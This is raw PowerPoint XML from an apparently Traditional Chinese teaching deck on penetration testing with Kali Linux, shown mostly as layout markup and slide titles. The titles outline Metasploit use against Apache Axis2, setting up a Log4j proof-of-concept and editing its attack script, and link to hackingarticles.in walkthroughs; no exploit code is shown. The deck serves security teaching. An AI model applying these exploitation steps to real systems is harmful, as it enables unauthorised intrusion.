          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3030322" y="2892726"/>
            <a:ext cx="4150766" cy="3015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071102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內容版面配置區 12"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="612648" y="1536509"/>
            <a:ext cx="7162800" cy="3781425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="圓角矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1089688" y="1924050"/>
            <a:ext cx="3299432" cy="27051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圓角矩形 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1272568" y="3972306"/>
            <a:ext cx="3299432" cy="2217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459179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561109" y="2444855"/>
            <a:ext cx="7772400" cy="2439113"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文字方塊 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2660073" y="1745673"/>
            <a:ext cx="646331" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>成功</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3358596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362878" y="257061"/>
            <a:ext cx="8086940" cy="898410"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>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dirty="0" smtClean="0"/>
              <a:t>01.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>資訊收集</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(Information Gathering)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="圖片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1859169" y="1292688"/>
            <a:ext cx="6145301" cy="5054022"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2295618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t="62445"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="581025" y="2513041"/>
            <a:ext cx="6991350" cy="1434436"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32367942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a:t>滲透</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="6000" dirty="0" smtClean="0"/>
              <a:t>測試專</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="6000" dirty="0"/>
              <a:t>題</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="6000" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="4400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42142762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133004" y="1248062"/>
            <a:ext cx="2975956" cy="4990687"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="133004" y="811522"/>
            <a:ext cx="7489767" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>https://www.hackingarticles.in/ctf-challenges-walkthrough/</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="圖片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3108960" y="1358104"/>
            <a:ext cx="3165562" cy="4947853"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="圖片 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6274522" y="1180854"/>
            <a:ext cx="2445529" cy="5051948"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21357823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815053" y="771560"/>
            <a:ext cx="6562934" cy="5853684"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="498764" y="402228"/>
            <a:ext cx="6866312" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>https://www.hackingarticles.in/penetration-testing/</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38416225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0534" y="218625"/>
            <a:ext cx="7772400" cy="695775"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Web Penetration Testing</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="內容版面配置區 4"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="415637" y="1099066"/>
            <a:ext cx="5459441" cy="5434738"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="415637" y="729734"/>
            <a:ext cx="6608618" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>https://www.hackingarticles.in/web-penetration-testing/</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42233625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1081087" y="2513012"/>
            <a:ext cx="6981825" cy="3267075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2502900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362878" y="257061"/>
            <a:ext cx="8086940" cy="898410"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>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dirty="0" smtClean="0"/>
              <a:t>01.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>資訊收集</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(Information Gathering)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="圖片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1767728" y="885218"/>
            <a:ext cx="6852436" cy="5316076"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1709539" y="3559881"/>
            <a:ext cx="2180817" cy="4239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793569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刻字型">
  <a:themeElements>
    <a:clrScheme name="木刻字型">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刻字型">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刻字型">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TM03090434[[fn=木頭類型]]</Template>
  <TotalTime>2788</TotalTime>
  <Words>3573</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>如螢幕大小 (4:3)</PresentationFormat>
  <Paragraphs>339</Paragraphs>
  <Slides>85</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85</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="93" baseType="lpstr">
      <vt:lpstr>source-serif-pro</vt:lpstr>
      <vt:lpstr>微軟正黑體</vt:lpstr>
      <vt:lpstr>標楷體</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Rockwell</vt:lpstr>
      <vt:lpstr>Rockwell Condensed</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>木刻字型</vt:lpstr>
      <vt:lpstr>滲透測試平台Kali Linux </vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>Kali Linux Tools：</vt:lpstr>
      <vt:lpstr>滲透測試</vt:lpstr>
      <vt:lpstr>Kali linux</vt:lpstr>
      <vt:lpstr>01.資訊收集(Information Gathering)</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>02.漏洞分析|Vulnerability analysis</vt:lpstr>
      <vt:lpstr>03.網站應用程式分析|web application analysis</vt:lpstr>
      <vt:lpstr>04.資料庫評估| Database assessment</vt:lpstr>
      <vt:lpstr>05.密碼攻擊| Password Attack</vt:lpstr>
      <vt:lpstr>06.無線網路攻擊| wireless Attack</vt:lpstr>
      <vt:lpstr>07.逆向工程 | reverse engineering</vt:lpstr>
      <vt:lpstr>08.攻擊工具 | EXPLOITATION tOOLS</vt:lpstr>
      <vt:lpstr>09.竊聽與欺瞞攻擊|sniffing &amp; spoofing</vt:lpstr>
      <vt:lpstr>10.後期攻擊|post-exploitation</vt:lpstr>
      <vt:lpstr>11.數位鑑識工具| Forensics</vt:lpstr>
      <vt:lpstr>12.報表工具 | Reproting tools</vt:lpstr>
      <vt:lpstr>13. 社交工程攻擊| Social engineering tools</vt:lpstr>
      <vt:lpstr>14. 系統服務|system service</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>Hping3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Fuzzer 模糊測試</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>Metasploit Framework</vt:lpstr>
      <vt:lpstr>The architecture of the Metasploit framework</vt:lpstr>
      <vt:lpstr>Google 搜尋 Apache Axis2 CVE 找到一個10分的漏洞</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>啟動metasploit : msfconsole</vt:lpstr>
      <vt:lpstr>滲透測試–Apache Axis2</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>修正錯誤的設定: set RPORT 8282 </vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>失敗</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>A Detailed Guide on Log4J Penetration Testing  https://www.hackingarticles.in/a-detailed-guide-on-log4j-penetration-testing/</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>建置log4j漏洞系統</vt:lpstr>
      <vt:lpstr>cd log4j-shell-poc</vt:lpstr>
      <vt:lpstr>建置log4j漏洞系統</vt:lpstr>
      <vt:lpstr>建置log4j漏洞系統</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>改攻擊程式碼poc.py</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>Web Penetration Testing</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owner</dc:creator>
  <cp:lastModifiedBy>owner</cp:lastModifiedBy>
  <cp:revision>98</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-11-07T13:00:20Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-12-19T13:58:01Z</dcterms:modified>
</cp:coreProperties>
</file>